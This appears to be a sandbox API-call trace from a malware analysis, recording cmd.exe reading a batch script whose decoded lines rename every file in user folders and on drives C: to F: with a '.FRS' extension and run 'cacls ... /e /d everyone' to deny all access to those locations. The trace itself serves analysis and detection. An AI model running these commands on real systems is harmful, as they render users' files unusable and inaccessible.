0xf7 [0114.940] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0114.940] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.940] GetFileType (hFile=0x158) returned 0x1 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0114.940] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0114.940] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0114.940] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.940] GetFileType (hFile=0x158) returned 0x1 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0114.940] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0114.940] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0114.940] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.940] GetFileType (hFile=0x158) returned 0x1 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0114.941] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0114.941] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0114.941] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.941] GetFileType (hFile=0x158) returned 0x1 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0114.941] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0114.941] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0114.941] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.941] GetFileType (hFile=0x158) returned 0x1 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0114.941] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0114.941] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0114.941] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.941] GetFileType (hFile=0x158) returned 0x1 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0114.941] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0114.941] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0114.941] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.941] GetFileType (hFile=0x158) returned 0x1 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0114.941] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.941] SetFilePointer (in: hFile=0x158, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0114.942] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0114.942] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.942] GetFileType (hFile=0x158) returned 0x1 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0114.942] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0114.942] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0114.942] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.942] GetFileType (hFile=0x158) returned 0x1 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0114.942] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0114.942] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0114.942] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.942] GetFileType (hFile=0x158) returned 0x1 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0114.942] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0114.942] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0114.942] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.942] GetFileType (hFile=0x158) returned 0x1 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0114.942] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0114.942] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0114.942] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0114.942] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.942] GetFileType (hFile=0x158) returned 0x1 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0114.943] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0114.943] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0114.943] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.943] GetFileType (hFile=0x158) returned 0x1 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0114.943] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0114.943] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0114.943] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.943] GetFileType (hFile=0x158) returned 0x1 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0114.943] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0114.943] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0114.943] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.943] GetFileType (hFile=0x158) returned 0x1 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0114.943] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0114.943] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0114.943] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.943] GetFileType (hFile=0x158) returned 0x1 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0114.943] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.943] SetFilePointer (in: hFile=0x158, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0114.944] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0114.944] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.944] GetFileType (hFile=0x158) returned 0x1 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0114.944] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0114.944] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0114.944] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.944] GetFileType (hFile=0x158) returned 0x1 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0114.944] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0114.944] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0114.944] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.944] GetFileType (hFile=0x158) returned 0x1 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0114.944] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0114.944] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0114.944] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.944] GetFileType (hFile=0x158) returned 0x1 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0114.944] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0114.944] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0114.944] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0114.945] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.945] GetFileType (hFile=0x158) returned 0x1 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0114.945] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0114.945] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0114.945] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.945] GetFileType (hFile=0x158) returned 0x1 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0114.945] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0114.945] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0114.945] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.945] GetFileType (hFile=0x158) returned 0x1 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0114.945] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0114.945] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 